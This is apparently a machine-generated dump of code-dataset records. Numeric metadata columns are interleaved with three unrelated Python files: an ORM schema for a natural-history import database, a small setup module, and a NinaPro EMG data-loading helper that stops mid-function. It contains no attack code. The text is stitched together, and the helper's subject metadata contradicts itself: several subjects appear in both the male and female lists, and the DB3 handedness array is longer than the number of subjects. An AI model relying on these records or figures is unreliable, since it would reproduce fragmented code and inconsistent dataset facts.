| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
73eda429df48ad19b32145618d4c6bc1edd0c368
| 4,506
|
py
|
Python
|
nba_percolator/schema.py
|
naturalis/nba_percolator
|
606d161c8b6e4eb4f62e0bf1f417ca43e0a9028a
|
[
"Apache-2.0"
] | null | null | null |
nba_percolator/schema.py
|
naturalis/nba_percolator
|
606d161c8b6e4eb4f62e0bf1f417ca43e0a9028a
|
[
"Apache-2.0"
] | null | null | null |
nba_percolator/schema.py
|
naturalis/nba_percolator
|
606d161c8b6e4eb4f62e0bf1f417ca43e0a9028a
|
[
"Apache-2.0"
] | null | null | null |
"""Dit is het NBA preprocessing database schema.
Hierin zitten tabel definities waarmee import data kan worden gefilterd alvorens
een import in de NBA documentstore plaatsvind.
"""
from datetime import datetime
from pony.orm import Database, Optional, Json, Required, raw_sql
db = Database()
class Nsrtaxa_import(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Nsrtaxa_current(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Nsrmedia_import(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Nsrmedia_current(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Crsspecimen_import(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Crsspecimen_current(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Crsmedia_import(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Crsmedia_current(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Brahmsspecimen_import(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Brahmsspecimen_current(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Brahmsmedia_import(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Brahmsmedia_current(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Xenocantospecimen_import(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Xenocantospecimen_current(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Xenocantomedia_import(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Xenocantomedia_current(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Coltaxa_import(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Coltaxa_current(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Waarnemingspecimen_import(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Waarnemingspecimen_current(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Waarnemingmedia_current(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Waarnemingmedia_import(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Testspecimen_import(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Testspecimen_current(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Testmedia_import(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Testmedia_current(db.Entity):
rec = Optional(Json)
hash = Optional(str, index=True)
datum = Required(datetime, sql_default='now()')
class Deleted_records(db.Entity):
recid = Required(str, index=True)
status = Required(str, index=True)
count = Required(int, sql_default=1)
datum = Required(datetime, sql_default='now()')
| 26.197674
| 80
| 0.695961
| 562
| 4,506
| 5.480427
| 0.113879
| 0.072727
| 0.109091
| 0.21039
| 0.88539
| 0.88539
| 0.874351
| 0.874351
| 0.874351
| 0.874351
| 0
| 0.000268
| 0.173103
| 4,506
| 171
| 81
| 26.350877
| 0.826355
| 0.038615
| 0
| 0.705357
| 0
| 0
| 0.031214
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.133929
| 0
| 1.107143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
fb853cf089a5f08ad9e122487a4b5691c91d8747
| 193
|
py
|
Python
|
caldera/_setup/__init__.py
|
jvrana/caldera
|
a346324e77f20739e00a82f97530dda4906f59dd
|
[
"MIT"
] | 2
|
2021-12-13T17:52:17.000Z
|
2021-12-13T17:52:18.000Z
|
caldera/_setup/__init__.py
|
jvrana/caldera
|
a346324e77f20739e00a82f97530dda4906f59dd
|
[
"MIT"
] | 4
|
2020-10-06T21:06:15.000Z
|
2020-10-10T01:18:23.000Z
|
caldera/_setup/__init__.py
|
jvrana/caldera
|
a346324e77f20739e00a82f97530dda4906f59dd
|
[
"MIT"
] | null | null | null |
from caldera._setup.setup_nx_global_access import add_global_access_to_nx
from caldera.defaults import CalderaDefaults
def setup():
add_global_access_to_nx(CalderaDefaults.nx_global_key)
| 27.571429
| 73
| 0.865285
| 29
| 193
| 5.275862
| 0.448276
| 0.235294
| 0.196078
| 0.222222
| 0.248366
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088083
| 193
| 6
| 74
| 32.166667
| 0.869318
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
fb8f055112db1ea2b0d1602aacac4d6c0464a0b9
| 49,193
|
py
|
Python
|
nina_helper/nina_helper.py
|
jonDel/nina_helper_package_mk2
|
fc040e96fa7480f465d700d977e4cf11d6812d65
|
[
"MIT"
] | null | null | null |
nina_helper/nina_helper.py
|
jonDel/nina_helper_package_mk2
|
fc040e96fa7480f465d700d977e4cf11d6812d65
|
[
"MIT"
] | null | null | null |
nina_helper/nina_helper.py
|
jonDel/nina_helper_package_mk2
|
fc040e96fa7480f465d700d977e4cf11d6812d65
|
[
"MIT"
] | null | null | null |
"""Utility functions to help with working with NinaPro database."""
import os
import numpy as np
import scipy.io as sio
from sklearn.preprocessing import StandardScaler
from itertools import combinations, chain
from copy import copy
def db1_info():
"""Return relevant info on database 1.
Returns:
Dict: Useful information on database 1
"""
# General Info
nb_subjects = 27
nb_channels = 10
nb_moves = 53 # 52 + rest
nb_reps = 10
fs = 100
# Labels
rep_labels = np.array(range(1, nb_reps + 1))
move_labels = np.array(range(1, nb_moves + 1))
# Male - Female
female = np.array([6, 8, 10, 14, 15, 20, 22])
male = np.array([1, 2, 3, 4, 6, 8, 10, 11, 12, 15, 16, 17, 18, 20, 22, 23, 24, 25, 26, 27])
female_ind = np.array([5, 7, 9, 13, 14, 19, 21])
male_ind = np.array([0, 1, 2, 3, 5, 7, 9, 10, 11, 14, 15, 16, 17, 19, 21, 22, 23, 24, 25, 26])
# Handedness
left_handed = np.array([14, 16])
right_handed = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 15,
17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27])
left_handed_ind = np.array([13, 15])
right_handed_ind = np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12,
14, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26])
# Other Info (synced)
ages = np.array([31, 27, 22, 27, 27, 22, 28, 27, 23, 30, 28, 25, 27,
29, 26, 29, 30, 29, 34, 26, 38, 35, 30, 26, 28, 40, 28])
heights = np.array([170, 170, 180, 183, 178, 163, 170, 164, 173, 160, 170, 185, 184,
155, 162, 167, 175, 178, 173, 165, 178, 168, 180, 180, 180, 179, 185])
weights = np.array([75, 62, 85, 95, 75, 48, 60, 54, 63, 60, 67, 80, 85,
54, 60, 67, 76, 68, 82, 54, 73, 65, 65, 65, 70, 66, 100])
return {'nb_subjects': nb_subjects,
'nb_channels': nb_channels,
'nb_moves': nb_moves,
'nb_reps': nb_reps,
'fs': fs,
'rep_labels': rep_labels,
'move_labels': move_labels,
'female': female,
'male': male,
'female_ind': female_ind,
'male_ind': male_ind,
'left_handed': left_handed,
'right_handed': right_handed,
'left_handed_ind': left_handed_ind,
'right_handed_ind': right_handed_ind,
'ages': ages,
'heights': heights,
'weights': weights,
}
def db2_info():
"""Return relevant info on database 2.
Returns:
Dict: Useful information on database 2
"""
# General Info
nb_subjects = 40
nb_channels = 12
nb_moves = 50 # 40 + 9 force movements + rest
nb_reps = 6
fs = 2000
# Labels
rep_labels = np.array(range(1, nb_reps + 1))
move_labels = np.array(range(1, nb_moves + 1))
# Male - Female
female = np.array([4, 11, 14, 18, 19, 20, 22, 28, 35, 36, 38])
male = np.array([1, 2, 3, 5, 6, 7, 8, 9, 10, 12, 13, 15, 16, 17, 21,
23, 24, 25, 26, 27, 29, 30, 31, 32, 33, 34, 37, 39, 40])
female_ind = np.array([3, 10, 13, 17, 18, 19, 21, 27, 34, 35, 37])
male_ind = np.array([0, 1, 2, 4, 5, 6, 7, 8, 9, 11, 12, 14, 15, 16, 20,
22, 23, 24, 25, 26, 28, 29, 30, 31, 32, 33, 36, 38, 39])
# Handedness
left_handed = np.array([4, 13, 22, 25, 26])
right_handed = np.array([1, 2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 14, 15, 16, 17, 18, 19, 20,
21, 23, 24, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40])
left_handed_ind = np.array([3, 12, 21, 24, 25])
right_handed_ind = np.array([0, 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 13, 14, 15, 16, 17, 18, 19,
20, 22, 23, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39])
# Other Info (synced)
ages = np.array([29, 29, 31, 30, 25, 35, 27, 45, 23, 34, 32, 29, 30, 30, 30, 34, 29, 30, 31,
26, 32, 28, 25, 28, 31, 30, 29, 29, 27, 30, 29, 28, 25, 31, 24, 27, 34, 30, 31, 31])
heights = np.array([187, 183, 174, 154, 175, 172, 187, 173, 172, 173, 150, 184, 182, 173, 169, 173, 175, 169, 158,
155, 170, 162, 170, 170, 168, 186, 170, 160, 171, 173, 185, 173, 183, 192, 170, 155, 190, 163,
183, 173])
weights = np.array([75, 75, 69, 50, 70, 79, 92, 73, 63, 84, 54, 90, 70, 59, 58, 76, 70, 90, 52,
52, 75, 54, 66, 73, 70, 90, 65, 61, 64, 68, 98, 72, 71, 78, 52, 44, 105, 62, 96, 65])
return {'nb_subjects': nb_subjects,
'nb_channels': nb_channels,
'nb_moves': nb_moves,
'nb_reps': nb_reps,
'fs': fs,
'rep_labels': rep_labels,
'move_labels': move_labels,
'female': female,
'male': male,
'female_ind': female_ind,
'male_ind': male_ind,
'left_handed': left_handed,
'right_handed': right_handed,
'left_handed_ind': left_handed_ind,
'right_handed_ind': right_handed_ind,
'ages': ages,
'heights': heights,
'weights': weights,
}
def db3_info():
"""Return relevant info on database 3.
Returns:
Dict: Useful information on database 3
"""
# General Info
nb_subjects = 11
nb_reps = 6
fs = 2000
majority_nb_moves = 50
# General data
gen_dict = {
'nb_channels': 12,
'nb_moves': majority_nb_moves,
'move_labels': np.array(range(1, majority_nb_moves+1))
}
subjects_data = []
for subs in range(nb_subjects):
subjects_data.append(copy(gen_dict))
# Specific electrodes used:
for subs in [6, 7]:
subjects_data[subs]['nb_channels'] = 10
# Specific movements used
subjects_data[0]['nb_moves'] = 40
subjects_data[0]['move_labels'] = np.array(range(1, 41))
subjects_data[9]['nb_moves'] = 43
subjects_data[9]['move_labels'] = np.array(range(1, 44))
# Labels
rep_labels = np.array(range(1, nb_reps + 1))
# Handedness
left_handed = np.array([4])
right_handed = np.array([0, 1, 2, 3, 5, 6, 7, 8, 9, 10, 11])
# Amputated hand
left_hand_amp = left_handed
right_hand_amp = right_handed
# Other Info (synced)
ages = np.array([32, 35, 0, 34, 67, 32, 35, 33, 44, 59, 45])
heights = np.array([172, 183, 178, 166, 175, 172, 185, 175, 180, 177, 183])
weights = np.array([86, 81, 82, 68, 75, 66, 75, 80, 95, 86, 75])
rem_forearm = np.array([50, 70, 30, 40, 90, 40, 0, 50, 90, 50, 90])
years_after_amp = np.array([13, 6, 5, 1, 1, 13, 7, 5, 14, 2, 5])
amp_type = ["Accident"]*(nb_subjects-1)
amp_type.append("Cancer")
phant_limb_sens = np.array([2, 5, 2, 1, 2, 4, 0, 2, 5, 5, 4])
dash_score = np.array([1.67, 15.18, 22.5, 86.67, 11.67, 37.5, 31.67, 33.33, 3.33, 11.76, 12.5])
cosm_use = np.array([0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0])
kinem_use = np.array([0, 0, 8, 0, 0.4, 12, 0, 0, 0, 1.66, 5])
myo_use = np.array([13, 0, 8, 0, 0, 0, 6, 4, 14, 0, 5])
return {
'subjects': subjects_data,
'nb_subjects': nb_subjects,
'nb_reps': nb_reps,
'fs': fs,
'rep_labels': rep_labels,
'left_handed': left_handed,
'right_handed': right_handed,
'left_handed_amp': left_hand_amp,
'right_handed_amp': right_hand_amp,
'ages': ages,
'heights': heights,
'weights': weights,
'rem_forearm': rem_forearm,
'years_after_amp': years_after_amp,
'amp_type': amp_type,
'phant_limb_sens': phant_limb_sens,
'dash_score': dash_score,
'cosm_use': cosm_use,
'kinem_use': kinem_use,
'myo_use': myo_use
}
def import_db1(folder_path, subject, rest_length_cap=999):
"""Function for extracting data from raw NinaiPro files for DB1.
Args:
folder_path (string): Path to folder containing raw mat files
subject (int): 1-27 which subject's data to import
rest_length_cap (int, optional): The number of seconds of rest data to keep before/after a movement
Returns:
Dictionary: Raw EMG data, corresponding repetition and movement labels, indices of where repetitions are
demarked and the number of repetitions with capped off rest data
"""
fs = 100
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_A1_E1.mat')
data = sio.loadmat(cur_path)
emg = np.squeeze(np.array(data['emg']))
rep = np.squeeze(np.array(data['rerepetition']))
move = np.squeeze(np.array(data['restimulus']))
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_A1_E2.mat')
data = sio.loadmat(cur_path)
emg = np.vstack((emg, np.array(data['emg'])))
rep = np.append(rep, np.squeeze(np.array(data['rerepetition'])))
move_tmp = np.squeeze(np.array(data['restimulus'])) # Fix for numbering
move_tmp[move_tmp != 0] += max(move)
move = np.append(move, move_tmp)
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_A1_E3.mat')
data = sio.loadmat(cur_path)
emg = np.vstack((emg, np.array(data['emg'])))
rep = np.append(rep, np.squeeze(np.array(data['rerepetition'])))
move_tmp = np.squeeze(np.array(data['restimulus'])) # Fix for numbering
move_tmp[move_tmp != 0] += max(move)
move = np.append(move, move_tmp)
move = move.astype('int8') # To minimise overhead
# Label repetitions using new block style: rest-move-rest regions
move_regions = np.where(np.diff(move))[0]
rep_regions = np.zeros((move_regions.shape[0],), dtype=int)
nb_reps = int(round(move_regions.shape[0] / 2))
last_end_idx = int(round(move_regions[0] / 2))
nb_unique_reps = np.unique(rep).shape[0] - 1 # To account for 0 regions
nb_capped = 0
cur_rep = 1
rep = np.zeros([rep.shape[0], ], dtype=np.int8) # Reset rep array
for i in range(nb_reps - 1):
rep_regions[2 * i] = last_end_idx
midpoint_idx = int(round((move_regions[2 * (i + 1) - 1] +
move_regions[2 * (i + 1)]) / 2)) + 1
trailing_rest_samps = midpoint_idx - move_regions[2 * (i + 1) - 1]
if trailing_rest_samps <= rest_length_cap * fs:
rep[last_end_idx:midpoint_idx] = cur_rep
last_end_idx = midpoint_idx
rep_regions[2 * i + 1] = midpoint_idx - 1
else:
rep_end_idx = (move_regions[2 * (i + 1) - 1] +
int(round(rest_length_cap * fs)))
rep[last_end_idx:rep_end_idx] = cur_rep
last_end_idx = ((move_regions[2 * (i + 1)] -
int(round(rest_length_cap * fs))))
rep_regions[2 * i + 1] = rep_end_idx - 1
nb_capped += 2
cur_rep += 1
if cur_rep > nb_unique_reps:
cur_rep = 1
end_idx = int(round((emg.shape[0] + move_regions[-1]) / 2))
rep[last_end_idx:end_idx] = cur_rep
rep_regions[-2] = last_end_idx
rep_regions[-1] = end_idx - 1
return {'emg': emg,
'rep': rep,
'move': move,
'rep_regions': rep_regions,
'nb_capped': nb_capped
}
def import_db1_unrefined(folder_path, subject, rest_length_cap=999):
"""Get the original repetition and stimulus information DB1 (repetition still aligned as rest-move-rest).
Args:
folder_path (string): Path to folder containing raw mat files
subject (int): 1-27 which subject's data to import
rest_length_cap (int, optional): The number of seconds of rest data to keep before/after a movement
Returns:
Dictionary: Unrefined repetition and movement labels, indices of where repetitions are
demarked and the number of repetitions with capped off rest data
"""
fs = 100
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_A1_E1.mat')
data = sio.loadmat(cur_path)
rep = np.squeeze(np.array(data['repetition']))
move = np.squeeze(np.array(data['stimulus']))
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_A1_E2.mat')
data = sio.loadmat(cur_path)
rep = np.append(rep, np.squeeze(np.array(data['repetition'])))
move_tmp = np.squeeze(np.array(data['stimulus'])) # Fix for numbering
move_tmp[move_tmp != 0] += max(move)
move = np.append(move, move_tmp)
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_A1_E3.mat')
data = sio.loadmat(cur_path)
rep = np.append(rep, np.squeeze(np.array(data['repetition'])))
move_tmp = np.squeeze(np.array(data['stimulus'])) # Fix for numbering
move_tmp[move_tmp != 0] += max(move)
move = np.append(move, move_tmp)
move = move.astype('int8') # To minimise overhead
# Label repetitions using new block style: rest-move-rest regions
move_regions = np.where(np.diff(move))[0]
rep_regions = np.zeros((move_regions.shape[0],), dtype=int)
nb_reps = int(round(move_regions.shape[0] / 2))
last_end_idx = int(round(move_regions[0] / 2))
nb_unique_reps = np.unique(rep).shape[0] - 1 # To account for 0 regions
nb_capped = 0
cur_rep = 1
rep = np.zeros([rep.shape[0], ], dtype=np.int8) # Reset rep array
for i in range(nb_reps - 1):
rep_regions[2 * i] = last_end_idx
midpoint_idx = int(round((move_regions[2 * (i + 1) - 1] +
move_regions[2 * (i + 1)]) / 2)) + 1
trailing_rest_samps = midpoint_idx - move_regions[2 * (i + 1) - 1]
if trailing_rest_samps <= rest_length_cap * fs:
rep[last_end_idx:midpoint_idx] = cur_rep
last_end_idx = midpoint_idx
rep_regions[2 * i + 1] = midpoint_idx - 1
else:
rep_end_idx = (move_regions[2 * (i + 1) - 1] +
int(round(rest_length_cap * fs)))
rep[last_end_idx:rep_end_idx] = cur_rep
last_end_idx = ((move_regions[2 * (i + 1)] -
int(round(rest_length_cap * fs))))
rep_regions[2 * i + 1] = rep_end_idx - 1
nb_capped += 2
cur_rep += 1
if cur_rep > nb_unique_reps:
cur_rep = 1
end_idx = int(round((rep.shape[0] + move_regions[-1]) / 2))
rep[last_end_idx:end_idx] = cur_rep
rep_regions[-2] = last_end_idx
rep_regions[-1] = end_idx - 1
return {'rep': rep,
'move': move,
'rep_regions': rep_regions,
'nb_capped': nb_capped
}
def import_db2(folder_path, subject, rest_length_cap=999):
"""Function for extracting data from raw NinaiPro files for DB2.
Args:
folder_path (string): Path to folder containing raw mat files
subject (int): 1-40 which subject's data to import
rest_length_cap (int, optional): The number of seconds of rest data to keep before/after a movement
Returns:
Dictionary: Raw EMG data, corresponding repetition and movement labels, indices of where repetitions are
demarked and the number of repetitions with capped off rest data
Note:
Last 9 "movements" are actually force exercises
"""
fs = 2000
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E1_A1.mat')
data = sio.loadmat(cur_path)
emg = np.squeeze(np.array(data['emg']))
rep = np.squeeze(np.array(data['rerepetition']))
move = np.squeeze(np.array(data['restimulus']))
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E2_A1.mat')
data = sio.loadmat(cur_path)
emg = np.vstack((emg, np.array(data['emg'])))
rep = np.append(rep, np.squeeze(np.array(data['rerepetition'])))
move_tmp = np.squeeze(np.array(data['restimulus']))
move = np.append(move, move_tmp) # Note no fix needed for this exercise
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E3_A1.mat')
data = sio.loadmat(cur_path)
emg = np.vstack((emg, np.array(data['emg'])))
data['repetition'][-1] = 0 # Fix for diffing
rep = np.append(rep, np.squeeze(np.array(data['repetition'])))
# Movements number in non-logical pattern [0 1 2 4 6 8 9 16 32 40]
# Also note that for last file there is no 'rerepetition or 'restimulus'
data['stimulus'][-1] = 0 # Fix for diffing
data['stimulus'][np.where(data['stimulus'] == 1)] = 41
data['stimulus'][np.where(data['stimulus'] == 2)] = 42
data['stimulus'][np.where(data['stimulus'] == 4)] = 43
data['stimulus'][np.where(data['stimulus'] == 6)] = 44
data['stimulus'][np.where(data['stimulus'] == 8)] = 45
data['stimulus'][np.where(data['stimulus'] == 9)] = 46
data['stimulus'][np.where(data['stimulus'] == 16)] = 47
data['stimulus'][np.where(data['stimulus'] == 32)] = 48
data['stimulus'][np.where(data['stimulus'] == 40)] = 49
move_tmp = np.squeeze(np.array(data['stimulus']))
move = np.append(move, move_tmp)
move = move.astype('int8') # To minimise overhead
# Label repetitions using new block style: rest-move-rest regions
move_regions = np.where(np.diff(move))[0]
rep_regions = np.zeros((move_regions.shape[0],), dtype=int)
nb_reps = int(round(move_regions.shape[0] / 2))
last_end_idx = int(round(move_regions[0] / 2))
nb_unique_reps = np.unique(rep).shape[0] - 1 # To account for 0 regions
nb_capped = 0
cur_rep = 1
rep = np.zeros([rep.shape[0], ], dtype=np.int8) # Reset rep array
for i in range(nb_reps - 1):
rep_regions[2 * i] = last_end_idx
midpoint_idx = int(round((move_regions[2 * (i + 1) - 1] +
move_regions[2 * (i + 1)]) / 2)) + 1
trailing_rest_samps = midpoint_idx - move_regions[2 * (i + 1) - 1]
if trailing_rest_samps <= rest_length_cap * fs:
rep[last_end_idx:midpoint_idx] = cur_rep
last_end_idx = midpoint_idx
rep_regions[2 * i + 1] = midpoint_idx - 1
else:
rep_end_idx = (move_regions[2 * (i + 1) - 1] +
int(round(rest_length_cap * fs)))
rep[last_end_idx:rep_end_idx] = cur_rep
last_end_idx = ((move_regions[2 * (i + 1)] -
int(round(rest_length_cap * fs))))
rep_regions[2 * i + 1] = rep_end_idx - 1
nb_capped += 2
cur_rep += 1
if cur_rep > nb_unique_reps:
cur_rep = 1
end_idx = int(round((emg.shape[0] + move_regions[-1]) / 2))
rep[last_end_idx:end_idx] = cur_rep
rep_regions[-2] = last_end_idx
rep_regions[-1] = end_idx - 1
return {'emg': emg,
'rep': rep,
'move': move,
'rep_regions': rep_regions,
'nb_capped': nb_capped
}
def import_db2_unrefined(folder_path, subject, rest_length_cap=999):
"""Get the original repetition and stimulus information DB1 (repetition still aligned as rest-move-rest).
Args:
folder_path (string): Path to folder containing raw mat files
subject (int): 1-27 which subject's data to import
rest_length_cap (int, optional): The number of seconds of rest data to keep before/after a movement
Returns:
Dictionary: Unrefined repetition and movement labels, indices of where repetitions are
demarked and the number of repetitions with capped off rest data
"""
fs = 2000
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E1_A1.mat')
data = sio.loadmat(cur_path)
rep = np.squeeze(np.array(data['repetition']))
move = np.squeeze(np.array(data['stimulus']))
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E2_A1.mat')
data = sio.loadmat(cur_path)
rep = np.append(rep, np.squeeze(np.array(data['repetition'])))
move_tmp = np.squeeze(np.array(data['stimulus']))
move = np.append(move, move_tmp) # Note no fix needed for this exercise
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E3_A1.mat')
data = sio.loadmat(cur_path)
data['repetition'][-1] = 0 # Fix for diffing
rep = np.append(rep, np.squeeze(np.array(data['repetition'])))
# Movements number in non-logical pattern [0 1 2 4 6 8 9 16 32 40]
data['stimulus'][-1] = 0 # Fix for diffing
data['stimulus'][np.where(data['stimulus'] == 1)] = 41
data['stimulus'][np.where(data['stimulus'] == 2)] = 42
data['stimulus'][np.where(data['stimulus'] == 4)] = 43
data['stimulus'][np.where(data['stimulus'] == 6)] = 44
data['stimulus'][np.where(data['stimulus'] == 8)] = 45
data['stimulus'][np.where(data['stimulus'] == 9)] = 46
data['stimulus'][np.where(data['stimulus'] == 16)] = 47
data['stimulus'][np.where(data['stimulus'] == 32)] = 48
data['stimulus'][np.where(data['stimulus'] == 40)] = 49
move_tmp = np.squeeze(np.array(data['stimulus']))
move = np.append(move, move_tmp)
move = move.astype('int8') # To minimise overhead
# Label repetitions using new block style: rest-move-rest regions
move_regions = np.where(np.diff(move))[0]
rep_regions = np.zeros((move_regions.shape[0],), dtype=int)
nb_reps = int(round(move_regions.shape[0] / 2))
last_end_idx = int(round(move_regions[0] / 2))
nb_unique_reps = np.unique(rep).shape[0] - 1 # To account for 0 regions
nb_capped = 0
cur_rep = 1
rep = np.zeros([rep.shape[0], ], dtype=np.int8) # Reset rep array
for i in range(nb_reps - 1):
rep_regions[2 * i] = last_end_idx
midpoint_idx = int(round((move_regions[2 * (i + 1) - 1] +
move_regions[2 * (i + 1)]) / 2)) + 1
trailing_rest_samps = midpoint_idx - move_regions[2 * (i + 1) - 1]
if trailing_rest_samps <= rest_length_cap * fs:
rep[last_end_idx:midpoint_idx] = cur_rep
last_end_idx = midpoint_idx
rep_regions[2 * i + 1] = midpoint_idx - 1
else:
rep_end_idx = (move_regions[2 * (i + 1) - 1] +
int(round(rest_length_cap * fs)))
rep[last_end_idx:rep_end_idx] = cur_rep
last_end_idx = ((move_regions[2 * (i + 1)] -
int(round(rest_length_cap * fs))))
rep_regions[2 * i + 1] = rep_end_idx - 1
nb_capped += 2
cur_rep += 1
if cur_rep > nb_unique_reps:
cur_rep = 1
end_idx = int(round((rep.shape[0] + move_regions[-1]) / 2))
rep[last_end_idx:end_idx] = cur_rep
rep_regions[-2] = last_end_idx
rep_regions[-1] = end_idx - 1
return {'rep': rep,
'move': move,
'rep_regions': rep_regions,
'nb_capped': nb_capped
}
def import_db3(folder_path, subject, rest_length_cap=999):
"""Function for extracting data from raw NinaiPro files for DB3.
Args:
folder_path (string): Path to folder containing raw mat files
subject (int): 1-11 which subject's data to import
rest_length_cap (int, optional): The number of seconds of rest data to keep before/after a movement
Returns:
Dictionary: Raw EMG data, corresponding repetition and movement labels, indices of where repetitions are
demarked and the number of repetitions with capped off rest data
Note:
Last 9 "movements" are actually force exercises
"""
fs = 2000
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E1_A1.mat')
data = sio.loadmat(cur_path)
emg = np.squeeze(np.array(data['emg']))
rep = np.squeeze(np.array(data['rerepetition']))
move = np.squeeze(np.array(data['restimulus']))
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E2_A1.mat')
data = sio.loadmat(cur_path)
emg = np.vstack((emg, np.array(data['emg'])))
rep = np.append(rep, np.squeeze(np.array(data['rerepetition'])))
move_tmp = np.squeeze(np.array(data['restimulus']))
move = np.append(move, move_tmp) # Note no fix needed for this exercise
last_mov = max(move)
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E3_A1.mat')
data = sio.loadmat(cur_path)
emg = np.vstack((emg, np.array(data['emg'])))
rep = np.append(rep, np.squeeze(np.array(data['rerepetition'])))
data['restimulus'][np.where(data['restimulus'] == 1)] = last_mov + 1
data['restimulus'][np.where(data['restimulus'] == 2)] = last_mov + 2
data['restimulus'][np.where(data['restimulus'] == 4)] = last_mov + 3
data['restimulus'][np.where(data['restimulus'] == 6)] = last_mov + 4
data['restimulus'][np.where(data['restimulus'] == 8)] = last_mov + 5
data['restimulus'][np.where(data['restimulus'] == 9)] = last_mov + 6
data['restimulus'][np.where(data['restimulus'] == 16)] = last_mov + 7
data['restimulus'][np.where(data['restimulus'] == 32)] = last_mov + 8
data['restimulus'][np.where(data['restimulus'] == 40)] = last_mov + 9
move_tmp = np.squeeze(np.array(data['restimulus']))
move = np.append(move, move_tmp) # Note no fix needed for this exercise
move = move.astype('int8') # To minimise overhead
# Label repetitions using new block style: rest-move-rest regions
move_regions = np.where(np.diff(move))[0]
rep_regions = np.zeros((move_regions.shape[0],), dtype=int)
nb_reps = int(round(move_regions.shape[0] / 2))
last_end_idx = int(round(move_regions[0] / 2))
nb_unique_reps = np.unique(rep).shape[0] - 1 # To account for 0 regions
nb_capped = 0
cur_rep = 1
rep = np.zeros([rep.shape[0], ], dtype=np.int8) # Reset rep array
